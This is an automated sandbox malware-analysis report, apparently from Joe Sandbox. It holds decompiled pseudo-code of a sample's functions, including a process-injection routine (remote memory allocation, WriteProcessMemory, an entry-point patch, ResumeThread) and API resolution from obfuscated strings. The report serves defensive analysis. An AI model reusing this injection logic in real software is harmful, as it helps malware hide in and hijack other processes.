				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t76;

				_t55 =  *0x3b8628; // 0x593938
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				_t76 = 0;
				_t54 = 0; // executed
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x180))))( &_v16, 0, 0, 0x18, 0xf0000000); // executed
				if(_t33 != 0) {
					_push( &_v8);
					_t42 =  *0x3b8628; // 0x593938
					_push(0);
					_push(0);
					_push(_a20);
					_push(_v16);
					if( *((intOrPtr*)( *((intOrPtr*)(_t42 + 0x16c))))() != 0) {
						_push(0);
						_push(_a8);
						_t71 =  *0x3b8628; // 0x593938
						_push(_a4);
						_push(_v8);
						if( *((intOrPtr*)( *((intOrPtr*)(_t71 + 0x160))))() != 0) {
							_push(0);
							_push( &_v20);
							_t62 =  *0x3b8628; // 0x593938
							_push( &_v12);
							_push(4);
							_v20 = 4;
							_push(_v8);
							if( *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x184))))() != 0) {
								_t76 = E003A1D90(_v12, 0);
								if(_t76 != 0) {
									_t51 =  *0x3b8628; // 0x593938
									_push(0);
									_push( &_v12);
									_push(_t76);
									_push(2);
									_push(_v8);
									if( *((intOrPtr*)( *((intOrPtr*)(_t51 + 0x184))))() == 0) {
										E0039BB40(_t76);
									} else {
										_t54 = 1;
									}
								}
							}
						}
					}
				}
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 =  *0x3b8628; // 0x593938
					 *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x164))))(_t34);
				}
				_t35 = _v16;
				if(_t35 != 0) {
					_t57 =  *0x3b8628; // 0x593938
					 *((intOrPtr*)( *((intOrPtr*)(_t57 + 0x178))))(_t35, 0);
				}
				 *_a12 = _t76;
				 *_a16 = _v12;
				return _t54;
			}



















    0x0039f726
    0x0039f73d
    0x0039f740
    0x0039f743
    0x0039f746
    0x0039f750
    0x0039f752
    0x0039f754
    0x0039f758
    0x0039f767
    0x0039f768
    0x0039f76d
    0x0039f76e
    0x0039f76f
    0x0039f776
    0x0039f77b
    0x0039f78a
    0x0039f78b
    0x0039f78c
    0x0039f792
    0x0039f799
    0x0039f79e
    0x0039f7a3
    0x0039f7a7
    0x0039f7a8
    0x0039f7b1
    0x0039f7b2
    0x0039f7b4
    0x0039f7c1
    0x0039f7c6
    0x0039f7d2
    0x0039f7d9
    0x0039f7de
    0x0039f7e3
    0x0039f7e7
    0x0039f7ee
    0x0039f7ef
    0x0039f7f1
    0x0039f7f6
    0x0039f7fe
    0x0039f7f8
    0x0039f7f8
    0x0039f7f8
    0x0039f7f6
    0x0039f7d9
    0x0039f7c6
    0x0039f79e
    0x0039f77b
    0x0039f806
    0x0039f80b
    0x0039f80d
    0x0039f81a
    0x0039f81a
    0x0039f81c
    0x0039f821
    0x0039f823
    0x0039f831
    0x0039f831
    0x0039f83c
    0x0039f842
    0x0039f848

    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039DFB0, Relevance: 23.2, APIs: 10, Strings: 3, Instructions: 434librarythread

    Control-flow Graph

    C-Code - Quality: 91%
    			E0039DFB0(void* __ecx, struct HINSTANCE__* _a4, void* _a8) {
				int _v8;
				intOrPtr _v12;
				short _v14;
				int _v18;
				char _v20;
				intOrPtr _v52;
				intOrPtr _v88;
				intOrPtr _v92;
				_Unknown_base(*)()* _v96;
				_Unknown_base(*)()* _v100;
				_Unknown_base(*)()* _v104;
				_Unknown_base(*)()* _v108;
				_Unknown_base(*)()* _v112;
				_Unknown_base(*)()* _v116;
				_Unknown_base(*)()* _v120;
				_Unknown_base(*)()* _v124;
				char _v128;
				long _v132;
				void _v136;
				char _v236;
				char _v436;
				intOrPtr _t133;
				intOrPtr _t134;
				intOrPtr _t135;
				long _t137;
				intOrPtr _t138;
				long _t141;
				long _t148;
				intOrPtr _t150;
				intOrPtr _t152;
				long _t153;
				intOrPtr _t156;
				intOrPtr _t160;
				intOrPtr _t164;
				intOrPtr _t168;
				long _t171;
				intOrPtr _t172;
				long _t175;
				long _t176;
				long _t178;
				_Unknown_base(*)()* _t207;
				long _t208;
				long _t209;
				long _t211;
				long _t217;
				long _t218;
				long _t222;
				long _t224;
				intOrPtr _t226;
				intOrPtr _t262;
				intOrPtr _t263;
				intOrPtr _t264;
				intOrPtr _t272;
				intOrPtr _t276;
				intOrPtr _t277;
				intOrPtr _t278;
				intOrPtr _t291;
				void* _t306;
				struct HINSTANCE__* _t307;
				void* _t310;

				_t222 = 0;
				_t310 = __ecx;
				_v8 = 0;
				if( *((intOrPtr*)(__ecx + 0x6c)) == 0) {
					memset( &_v136, 0, 0x70);
					_t226 =  *0x3b8628; // 0x593938
					_t133 =  *((intOrPtr*)( *((intOrPtr*)(_t226 + 0x88))))(0, 0, 0, 0, _t306);
					 *((intOrPtr*)(_t310 + 0x80)) = _t133;
					_t134 =  *0x3b8628; // 0x593938
					_t135 =  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x88))))(0, 0, 0, 0);
					 *((intOrPtr*)(_t310 + 0x84)) = _t135;
					_t272 =  *0x3b8628; // 0x593938
					_t137 =  *((intOrPtr*)( *((intOrPtr*)(_t272 + 0x88))))(0, 1, 1, 0);
					_t307 = _a4;
					 *((intOrPtr*)(_t310 + 0x60)) = _a8;
					 *(_t310 + 0x88) = _t137;
					 *((intOrPtr*)(_t310 + 0x5c)) = _t307;
					_t138 =  *0x3b8628; // 0x593938
					_t14 = _t138 + 0x8c; // 0x5939c4
					_a4 = _t14;
					_t18 = _t310 + 0x80; // 0x828b003b
					_t141 =  *(_a4->i)( *((intOrPtr*)( *((intOrPtr*)(_t138 + 0x100))))( *_t18, _t307,  &_v136, 0, 0, 2));
					__eflags = _t141;
					if(_t141 == 0) {
						L21:
						_t98 = _t310 + 0x80; // 0x828b003b
						_t276 =  *0x3b8628; // 0x593938
						 *((intOrPtr*)( *((intOrPtr*)(_t276 + 0xf8))))( *_t98);
						_t100 = _t310 + 0x84; // 0xc8
						_t277 =  *0x3b8628; // 0x593938
						 *((intOrPtr*)( *((intOrPtr*)(_t277 + 0xf8))))( *_t100);
						_t102 = _t310 + 0x88; // 0x3e868
						_t278 =  *0x3b8628; // 0x593938
						 *((intOrPtr*)( *((intOrPtr*)(_t278 + 0xf8))))( *_t102);
						__eflags = _v136;
						if(_v136 != 0) {
							_t164 =  *0x3b8628; // 0x593938
							_t106 = _t164 + 0x8c; // 0x5939c4
							_a4 = _t106;
							 *(_a4->i)(_t307, _v136,  *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x100))))(0, 0, 0, 3));
						}
						__eflags = _v132;
						if(_v132 != 0) {
							_t160 =  *0x3b8628; // 0x593938
							_t112 = _t160 + 0x8c; // 0x5939c4
							_a4 = _t112;
							 *(_a4->i)(_t307, _v132,  *((intOrPtr*)( *((intOrPtr*)(_t160 + 0x100))))(0, 0, 0, 3));
						}
						__eflags =  *(_t310 + 0x88);
						if( *(_t310 + 0x88) != 0) {
							_t156 =  *0x3b8628; // 0x593938
							_t118 = _t156 + 0x8c; // 0x5939c4
							_a4 = _t118;
							 *(_a4->i)(_t307, _v128,  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x100))))(0, 0, 0, 3));
						}
						__eflags = _t222;
						if(_t222 != 0) {
							_t152 =  *0x3b8628; // 0x593938
							_t153 = _t152 + 0x6c;
							__eflags = _t153;
							_a8 = _t153;
							 *( *_a8)(_t307, _t222, E0039EA80(), 0x8000);
						}
						_t148 = _v8;
						__eflags = _t148;
						if(_t148 != 0) {
							_t150 =  *0x3b8628; // 0x593938
							 *((intOrPtr*)( *((intOrPtr*)(_t150 + 0x6c))))(_t307, _t148, 0x70, 0x8000);
						}
						__eflags = 0;
						 *(_t310 + 0x8c) = 0;
						 *(_t310 + 0x90) = 0;
						 *((intOrPtr*)(_t310 + 0x80)) = 0;
						 *((intOrPtr*)(_t310 + 0x84)) = 0;
						 *(_t310 + 0x88) = 0;
						return 0;
					} else {
						_t168 =  *0x3b8628; // 0x593938
						_t20 = _t168 + 0x8c; // 0x5939c4
						_a4 = _t20;
						_t24 = _t310 + 0x84; // 0xc8
						_t171 =  *(_a4->i)( *((intOrPtr*)( *((intOrPtr*)(_t168 + 0x100))))( *_t24, _t307,  &_v132, 0, 0, 2));
						__eflags = _t171;
						if(_t171 == 0) {
							goto L21;
						} else {
							_t172 =  *0x3b8628; // 0x593938
							_t26 = _t172 + 0x8c; // 0x5939c4
							_a4 = _t26;
							_t30 = _t310 + 0x88; // 0x3e868
							_t175 =  *(_a4->i)( *((intOrPtr*)( *((intOrPtr*)(_t172 + 0x100))))( *_t30, _t307,  &_v128, 0, 0, 2));
							__eflags = _t175;
							if(_t175 == 0) {
								goto L21;
							} else {
								_push(0x40);
								_push(0x3000);
								_t176 = E0039EA80();
								_push(_t176);
								_push(0);
								_push(_t307);
								E003A1E80(); // executed
								_t222 = _t176;
								__eflags = _t222;
								if(_t222 == 0) {
									goto L21;
								} else {
									_t178 = E00397B30(_t310, _t307, _t222, E0039E8B0, E0039EA80()); // executed
									__eflags = _t178;
									if(__eflags == 0) {
										goto L21;
									} else {
										_v92 = 0;
										_v88 = 0;
										_v52 = 0;
										E00399090(__eflags,  &_v436, 0x6c);
										_t291 =  *0x3b8628; // 0x593938
										_a4 =  *((intOrPtr*)( *((intOrPtr*)(_t291 + 0x24))))( &_v436);
										E00396CB0( &_v236, 0x90);
										_v124 = GetProcAddress(_a4,  &_v236);
										E00396CB0( &_v236, 0x91);
										_v120 = GetProcAddress(_a4,  &_v236);
										E00396CB0( &_v236, 0x92);
										_v116 = GetProcAddress(_a4,  &_v236);
										E00396CB0( &_v236, 0x93);
										_v112 = GetProcAddress(_a4,  &_v236);
										E00396CB0( &_v236, 0x94);
										_v108 = GetProcAddress(_a4,  &_v236);
										E00396CB0( &_v236, 0xbf);
										_v96 = GetProcAddress(_a4,  &_v236);
										E00396CB0( &_v236, 0xc0);
										_v104 = GetProcAddress(_a4,  &_v236);
										E00396CB0( &_v236, 0xc1);
										_t207 = GetProcAddress(_a4,  &_v236);
										__eflags = _v124;
										_v100 = _t207;
										if(_v124 == 0) {
											goto L21;
										} else {
											__eflags = _v120;
											if(_v120 == 0) {
												goto L21;
											} else {
												__eflags = _v116;
												if(_v116 == 0) {
													goto L21;
												} else {
													__eflags = _v112;
													if(_v112 == 0) {
														goto L21;
													} else {
														_push(0x40);
														_push(0x3000);
														_push(0x70);
														_push(0);
														_push(_t307);
														E003A1E80(); // executed
														_v8 = _t207;
														__eflags = _t207;
														if(_t207 == 0) {
															goto L21;
														} else {
															_t208 = E00397B30(_t310, _t307, _t207,  &_v136, 0x70); // executed
															__eflags = _t208;
															if(_t208 == 0) {
																goto L21;
															} else {
																_t209 = E00396740(_t310, _t307); // executed
																__eflags = _t209;
																if(_t209 == 0) {
																	goto L21;
																} else {
																	__eflags =  *(_t310 + 0x68);
																	if( *(_t310 + 0x68) == 0) {
																		_t262 =  *0x3b8628; // 0x593938
																		_t211 =  *((intOrPtr*)( *((intOrPtr*)(_t262 + 0x64))))(_t307, 0, 0, _t222, _v8, 4, 0);
																		_a8 = _t211;
																	} else {
																		_v18 = _v8;
																		_v12 = _t222 - _t209 - 0xc;
																		_v20 = 0x6858;
																		_v14 = 0xe950;
																		_t211 = E00397B30(_t310, _t307, _t209,  &_v20, 0xc); // executed
																	}
																	__eflags = _t211;
																	if(_t211 == 0) {
																		goto L21;
																	} else {
																		_t87 = _t310 + 0x84; // 0xc8
																		_t263 =  *0x3b8628; // 0x593938
																		 *((intOrPtr*)( *((intOrPtr*)(_t263 + 0x80))))( *_t87);
																		_t89 = _t310 + 0x80; // 0x828b003b
																		_t264 =  *0x3b8628; // 0x593938
																		 *((intOrPtr*)( *((intOrPtr*)(_t264 + 0x80))))( *_t89);
																		_t217 = ResumeThread(_a8); // executed
																		__eflags = _t217;
																		if(_t217 == 0) {
																			goto L21;
																		} else {
																			_t218 = E0039E730(_t310);
																			__eflags = _t218;
																			if(_t218 == 0) {
																				goto L21;
																			} else {
																				 *(_t310 + 0x90) = _t222;
																				 *(_t310 + 0x8c) = _v8;
																				_t224 = _t222 - E0039E8B0 + E0039EA20;
																				__eflags = _t224;
																				 *(_t310 + 0x94) = _t224;
																				 *((intOrPtr*)(_t310 + 0x6c)) = 1;
																				return 1;
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				} else {
					return 0;
				}
			}































































    0x0039dfbb
    0x0039dfbd
    0x0039dfbf
    0x0039dfc5
    0x0039dfdc
    0x0039dfe1
    0x0039dff4
    0x0039dff8
    0x0039dffe
    0x0039e00b
    0x0039e010
    0x0039e016
    0x0039e025
    0x0039e027
    0x0039e031
    0x0039e034
    0x0039e03a
    0x0039e03d
    0x0039e044
    0x0039e057
    0x0039e05a
    0x0039e06a
    0x0039e06c
    0x0039e06e
    0x0039e3d2
    0x0039e3d2
    0x0039e3d8
    0x0039e3e5
    0x0039e3e7
    0x0039e3ed
    0x0039e3fa
    0x0039e3fc
    0x0039e402
    0x0039e40f
    0x0039e411
    0x0039e418
    0x0039e41a
    0x0039e42b
    0x0039e433
    0x0039e446
    0x0039e446
    0x0039e448
    0x0039e44c
    0x0039e44e
    0x0039e45f
    0x0039e467
    0x0039e477
    0x0039e477
    0x0039e479
    0x0039e480
    0x0039e482
    0x0039e493
    0x0039e49b
    0x0039e4ab
    0x0039e4ab
    0x0039e4ad
    0x0039e4af
    0x0039e4b1
    0x0039e4b6
    0x0039e4b6
    0x0039e4be
    0x0039e4ce
    0x0039e4ce
    0x0039e4d0
    0x0039e4d3
    0x0039e4d5
    0x0039e4df
    0x0039e4e8
    0x0039e4e8
    0x0039e4ea
    0x0039e4ed
    0x0039e4f3
    0x0039e4f9
    0x0039e4ff
    0x0039e505
    0x0039e510
    0x0039e074
    0x0039e074
    0x0039e07f
    0x0039e08f
    0x0039e092
    0x0039e0a2
    0x0039e0a4
    0x0039e0a6
    0x00000000
    0x0039e0ac
    0x0039e0ac
    0x0039e0b7
    0x0039e0c7
    0x0039e0ca
    0x0039e0da
    0x0039e0dc
    0x0039e0de
    0x00000000
    0x0039e0e4
    0x0039e0e4
    0x0039e0e6
    0x0039e0eb
    0x0039e0f0
    0x0039e0f1
    0x0039e0f3
    0x0039e0f6
    0x0039e0fb
    0x0039e0fd
    0x0039e0ff
    0x00000000
    0x0039e105
    0x0039e114
    0x0039e119
    0x0039e11b
    0x00000000
    0x0039e121
    0x0039e123
    0x0039e126
    0x0039e129
    0x0039e135
    0x0039e13a
    0x0039e15b
    0x0039e15e
    0x0039e183
    0x0039e186
    0x0039e1ab
    0x0039e1ae
    0x0039e1d3
    0x0039e1d6
    0x0039e1fb
    0x0039e1fe
    0x0039e223
    0x0039e226
    0x0039e23f
    0x0039e24e
    0x0039e273
    0x0039e276
    0x0039e289
    0x0039e28f
    0x0039e293
    0x0039e296
    0x00000000
    0x0039e29c
    0x0039e29c
    0x0039e2a0
    0x00000000
    0x0039e2a6
    0x0039e2a6
    0x0039e2aa
    0x00000000
    0x0039e2b0
    0x0039e2b0
    0x0039e2b4
    0x00000000
    0x0039e2ba
    0x0039e2ba
    0x0039e2bc
    0x0039e2c1
    0x0039e2c3
    0x0039e2c5
    0x0039e2c8
    0x0039e2cd
    0x0039e2d0
    0x0039e2d2
    0x00000000
    0x0039e2d8
    0x0039e2e5
    0x0039e2ea
    0x0039e2ec
    0x00000000
    0x0039e2f2
    0x0039e2f5
    0x0039e2fa
    0x0039e2fc
    0x00000000
    0x0039e302
    0x0039e302
    0x0039e306
    0x0039e338
    0x0039e34c
    0x0039e34e
    0x0039e308
    0x0039e30d
    0x0039e31c
    0x0039e322
    0x0039e328
    0x0039e32e
    0x0039e32e
    0x0039e351
    0x0039e353
    0x00000000
    0x0039e355
    0x0039e355
    0x0039e35b
    0x0039e368
    0x0039e36a
    0x0039e370
    0x0039e37d
    0x0039e38f
    0x0039e391
    0x0039e393
    0x00000000
    0x0039e395
    0x0039e397
    0x0039e39c
    0x0039e39e
    0x00000000
    0x0039e3a0
    0x0039e3a3
    0x0039e3af
    0x0039e3b5
    0x0039e3b5
    0x0039e3c1
    0x0039e3c7
    0x0039e3cf
    0x0039e3cf
    0x0039e39e
    0x0039e393
    0x0039e353
    0x0039e2fc
    0x0039e2ec
    0x0039e2d2
    0x0039e2b4
    0x0039e2aa
    0x0039e2a0
    0x0039e296
    0x0039e11b
    0x0039e0ff
    0x0039e0de
    0x0039e0a6
    0x0039dfc8
    0x0039dfce
    0x0039dfce

    APIs
    • memset.MSVCRT ref: 0039DFDC
      • Part of subcall function 00397B30: WriteProcessMemory.KERNELBASE(00000000,00000070,?,?,00000000,00000000,00000000,?,0039CCFB,?,?,?,00000070,?,?,?), ref: 00397B5C
    • GetProcAddress.KERNEL32(0039C9A1,?), ref: 0039E171
    • GetProcAddress.KERNEL32(0039C9A1,?), ref: 0039E199
    • GetProcAddress.KERNEL32(0039C9A1,?), ref: 0039E1C1
    • GetProcAddress.KERNEL32(0039C9A1,?), ref: 0039E1E9
    • GetProcAddress.KERNEL32(0039C9A1,?), ref: 0039E211
    • GetProcAddress.KERNEL32(0039C9A1,?), ref: 0039E239
    • GetProcAddress.KERNEL32(0039C9A1,?), ref: 0039E261
    • GetProcAddress.KERNEL32(0039C9A1,?), ref: 0039E289
      • Part of subcall function 00396740: NtQueryInformationProcess.NTDLL(00003000,00000000,0039C9A1,00000018,00000000,0039C9A1,0039FE81,00000000), ref: 00396768
    • ResumeThread.KERNELBASE(?), ref: 0039E38F
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039EB30, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 197library

    Control-flow Graph

    C-Code - Quality: 100%
    			E0039EB30() {
				char _v104;
				short _v304;
				intOrPtr _t28;
				void* _t29;
				struct HINSTANCE__* _t30;
				struct HINSTANCE__* _t31;
				intOrPtr _t35;
				struct HINSTANCE__* _t39;
				struct HINSTANCE__* _t41;
				_Unknown_base(*)()* _t44;
				_Unknown_base(*)()* _t47;
				_Unknown_base(*)()* _t50;
				_Unknown_base(*)()* _t53;
				_Unknown_base(*)()* _t56;
				_Unknown_base(*)()* _t59;
				_Unknown_base(*)()* _t62;
				_Unknown_base(*)()* _t65;
				_Unknown_base(*)()* _t68;
				_Unknown_base(*)()* _t71;
				intOrPtr _t86;
				struct HINSTANCE__* _t89;
				struct HINSTANCE__* _t90;
				struct HINSTANCE__* _t91;
				struct HINSTANCE__* _t92;
				struct HINSTANCE__* _t93;
				struct HINSTANCE__* _t94;
				struct HINSTANCE__* _t95;
				struct HINSTANCE__* _t96;
				struct HINSTANCE__* _t97;
				struct HINSTANCE__* _t98;
				void* _t99;
				void* _t103;

				_t28 =  *0x3b8628; // 0x593938
				 *0x3b85c0 = 0;
				 *0x3b85bc = 0;
				 *0x3b85c4 = 0;
				_t29 =  *((intOrPtr*)( *((intOrPtr*)(_t28 + 0xf4))))(_t99, _t103);
				_t122 = _t29 - 5;
				if(_t29 <= 5) {
					L14:
					_t30 =  *0x3b85bc; // 0x74e50000
					__eflags = _t30;
					if(_t30 != 0) {
						_t35 =  *0x3b8628; // 0x593938
						 *((intOrPtr*)( *((intOrPtr*)(_t35 + 0x1c))))(_t30);
						 *0x3b85bc = 0;
					}
					goto L16;
				} else {
					E00399090(_t122,  &_v304, 0x5b);
					_t39 = LoadLibraryW( &_v304); // executed
					 *0x3b85bc = _t39;
					_t123 = _t39;
					if(_t39 == 0) {
						L16:
						_t31 =  *0x3b85c4; // 0x74e30000
						__eflags = _t31;
						if(_t31 != 0) {
							_t86 =  *0x3b8628; // 0x593938
							 *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x1c))))(_t31);
							 *0x3b85c4 = 0;
						}
						__eflags = 0;
						return 0;
					} else {
						E00399090(_t123,  &_v304, 0x5c);
						_t41 = LoadLibraryW( &_v304);
						 *0x3b85c4 = _t41;
						if(_t41 == 0) {
							goto L14;
						} else {
							E00396CB0( &_v104, 0x5d);
							_t89 =  *0x3b85bc; // 0x74e50000
							_t44 = GetProcAddress(_t89,  &_v104);
							 *0x3b85d4 = _t44;
							if(_t44 == 0) {
								goto L14;
							} else {
								E00396CB0( &_v104, 0x5e);
								_t90 =  *0x3b85bc; // 0x74e50000
								_t47 = GetProcAddress(_t90,  &_v104);
								 *0x3b85e8 = _t47;
								if(_t47 == 0) {
									goto L14;
								} else {
									E00396CB0( &_v104, 0x5f);
									_t91 =  *0x3b85bc; // 0x74e50000
									_t50 = GetProcAddress(_t91,  &_v104);
									 *0x3b85cc = _t50;
									if(_t50 == 0) {
										goto L14;
									} else {
										E00396CB0( &_v104, 0x60);
										_t92 =  *0x3b85bc; // 0x74e50000
										_t53 = GetProcAddress(_t92,  &_v104);
										 *0x3b85b8 = _t53;
										if(_t53 == 0) {
											goto L14;
										} else {
											E00396CB0( &_v104, 0x61);
											_t93 =  *0x3b85c4; // 0x74e30000
											_t56 = GetProcAddress(_t93,  &_v104);
											 *0x3b85f4 = _t56;
											if(_t56 == 0) {
												goto L14;
											} else {
												E00396CB0( &_v104, 0x62);
												_t94 =  *0x3b85c4; // 0x74e30000
												_t59 = GetProcAddress(_t94,  &_v104);
												 *0x3b85e0 = _t59;
												if(_t59 == 0) {
													goto L14;
												} else {
													E00396CB0( &_v104, 0x63);
													_t95 =  *0x3b85c4; // 0x74e30000
													_t62 = GetProcAddress(_t95,  &_v104);
													 *0x3b85d0 = _t62;
													if(_t62 == 0) {
														goto L14;
													} else {
														E00396CB0( &_v104, 0x64);
														_t96 =  *0x3b85c4; // 0x74e30000
														_t65 = GetProcAddress(_t96,  &_v104);
														 *0x3b85e4 = _t65;
														if(_t65 == 0) {
															goto L14;
														} else {
															E00396CB0( &_v104, 0x65);
															_t97 =  *0x3b85c4; // 0x74e30000
															_t68 = GetProcAddress(_t97,  &_v104);
															 *0x3b85f0 = _t68;
															if(_t68 == 0) {
																goto L14;
															} else {
																E00396CB0( &_v104, 0x66);
																_t98 =  *0x3b85c4; // 0x74e30000
																_t71 = GetProcAddress(_t98,  &_v104);
																 *0x3b85ec = _t71;
																if(_t71 == 0) {
																	goto L14;
																} else {
																	 *0x3b85c0 = 1;
																	return 1;
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}



































    0x0039eb33
    0x0039eb42
    0x0039eb48
    0x0039eb4e
    0x0039eb5a
    0x0039eb5c
    0x0039eb5e
    0x0039ed4e
    0x0039ed4e
    0x0039ed53
    0x0039ed55
    0x0039ed58
    0x0039ed60
    0x0039ed62
    0x0039ed62
    0x00000000
    0x0039eb64
    0x0039eb6d
    0x0039eb82
    0x0039eb84
    0x0039eb89
    0x0039eb8b
    0x0039ed68
    0x0039ed68
    0x0039ed6d
    0x0039ed6f
    0x0039ed71
    0x0039ed7b
    0x0039ed7d
    0x0039ed7d
    0x0039ed84
    0x0039ed8a
    0x0039eb91
    0x0039eb9a
    0x0039eba9
    0x0039ebab
    0x0039ebb2
    0x00000000
    0x0039ebb8
    0x0039ebbe
    0x0039ebc3
    0x0039ebd7
    0x0039ebd9
    0x0039ebe0
    0x00000000
    0x0039ebe6
    0x0039ebec
    0x0039ebf1
    0x0039ebff
    0x0039ec01
    0x0039ec08
    0x00000000
    0x0039ec0e
    0x0039ec14
    0x0039ec19
    0x0039ec27
    0x0039ec29
    0x0039ec30
    0x00000000
    0x0039ec36
    0x0039ec3c
    0x0039ec41
    0x0039ec4f
    0x0039ec51
    0x0039ec58
    0x00000000
    0x0039ec5e
    0x0039ec64
    0x0039ec69
    0x0039ec77
    0x0039ec79
    0x0039ec80
    0x00000000
    0x0039ec86
    0x0039ec8c
    0x0039ec91
    0x0039ec9f
    0x0039eca1
    0x0039eca8
    0x00000000
    0x0039ecae
    0x0039ecb4
    0x0039ecb9
    0x0039ecc7
    0x0039ecc9
    0x0039ecd0
    0x00000000
    0x0039ecd2
    0x0039ecd8
    0x0039ecdd
    0x0039eceb
    0x0039eced
    0x0039ecf4
    0x00000000
    0x0039ecf6
    0x0039ecfc
    0x0039ed01
    0x0039ed0f
    0x0039ed11
    0x0039ed18
    0x00000000
    0x0039ed1a
    0x0039ed20
    0x0039ed25
    0x0039ed33
    0x0039ed35
    0x0039ed3c
    0x00000000
    0x0039ed3e
    0x0039ed44
    0x0039ed4d
    0x0039ed4d
    0x0039ed3c
    0x0039ed18
    0x0039ecf4
    0x0039ecd0
    0x0039eca8
    0x0039ec80
    0x0039ec58
    0x0039ec30
    0x0039ec08
    0x0039ebe0
    0x0039ebb2
    0x0039eb8b

    APIs
    • LoadLibraryW.KERNEL32(?), ref: 0039EB82
    • LoadLibraryW.KERNEL32(?), ref: 0039EBA9
    • GetProcAddress.KERNEL32(74E50000,?), ref: 0039EBD7
    • GetProcAddress.KERNEL32(74E50000,?), ref: 0039EBFF
    • GetProcAddress.KERNEL32(74E50000,?), ref: 0039EC27
    • GetProcAddress.KERNEL32(74E50000,?), ref: 0039EC4F
    • GetProcAddress.KERNEL32(74E30000,?), ref: 0039EC77
    • GetProcAddress.KERNEL32(74E30000,?), ref: 0039EC9F
    • GetProcAddress.KERNEL32(74E30000,?), ref: 0039ECC7
    • GetProcAddress.KERNEL32(74E30000,?), ref: 0039ECEB
    • GetProcAddress.KERNEL32(74E30000,?), ref: 0039ED0F
    • GetProcAddress.KERNEL32(74E30000,?), ref: 0039ED33
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00393D50, Relevance: 16.9, APIs: 11, Instructions: 368

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 207 393d50-393d54 208 393d5b 207->208 209 393d56 207->209 210 3961e0-396276 208->210 209->210 212 39627c-39628f 210->212 213 3965ae-3965b3 210->213 212->213 221 396295-3962b5 call 398030 call 3932c0 212->221 214 3965bd-3965c2 213->214 215 3965b5-3965b8 213->215 216 3965cc-3965d1 214->216 217 3965c4-3965c9 214->217 215->214 219 3965dc-3965e5 216->219 220 3965d3-3965d9 call 39bb40 216->220 217->216 220->219 228 3962c7-3962d7 call 395bd0 221->228 229 3962b7-3962c2 call 3b0580 221->229 228->213 234 3962dd-396371 call 399090 * 2 VariantInit * 2 call 3b0290 call 3913c0 228->234 229->213 243 39637a 234->243 244 396373-396378 234->244 245 396381-396394 call 3913c0 243->245 244->245 248 39639d 245->248 249 396396-39639b 245->249 250 3963a4-39643c call 397cf0 * 2 VariantClear * 3 248->250 249->250 256 3965a2 call 396d30 250->256 257 396442-396448 250->257 261 3965a7-3965a9 256->261 257->213 258 39644e-39645e call 395bd0 257->258 258->213 264 396464-3964df call 399090 VariantInit * 3 call 3913c0 258->264 261->213 263 3965ab 261->263 263->213 269 3964e8 264->269 270 3964e1-3964e6 264->270 271 3964ef-396502 call 3913c0 269->271 270->271 274 39650b 271->274 275 396504-396509 271->275 276 396512-3965a0 call 397cf0 * 2 VariantClear * 3 274->276 275->276 276->213
    C-Code - Quality: 72%
    			E00393D50(intOrPtr* __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				short _v22;
				char* _v24;
				intOrPtr _v26;
				void* _v28;
				intOrPtr _v30;
				void* _v32;
				intOrPtr _v34;
				char _v36;
				char _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				char _v56;
				intOrPtr* _v60;
				void* _v64;
				void* _v68;
				void* _v72;
				short _v74;
				void* _v76;
				void _v80;
				char* _v84;
				char _v88;
				char* _v92;
				intOrPtr* _v96;
				void* _v100;
				char _v104;
				char* _v108;
				intOrPtr* _v112;
				char* _v116;
				char _v120;
				intOrPtr* _v124;
				char* _v128;
				char* _v132;
				char _v136;
				char _v280;
				char _v336;
				char _v536;
				void* __ebx;
				void* __edi;
				intOrPtr* __esi;
				intOrPtr* __ebp;
				intOrPtr* _t239;
				void* _t241;
				intOrPtr* _t243;
				intOrPtr* _t244;
				intOrPtr* _t245;
				intOrPtr* _t246;
				intOrPtr* _t256;
				intOrPtr* _t260;
				intOrPtr* _t261;
				intOrPtr* _t262;
				intOrPtr* _t264;
				intOrPtr* _t268;
				intOrPtr* _t270;
				intOrPtr* _t271;
				intOrPtr* _t272;
				intOrPtr* _t273;
				intOrPtr* _t275;
				intOrPtr* _t276;
				intOrPtr* _t277;
				intOrPtr* _t278;
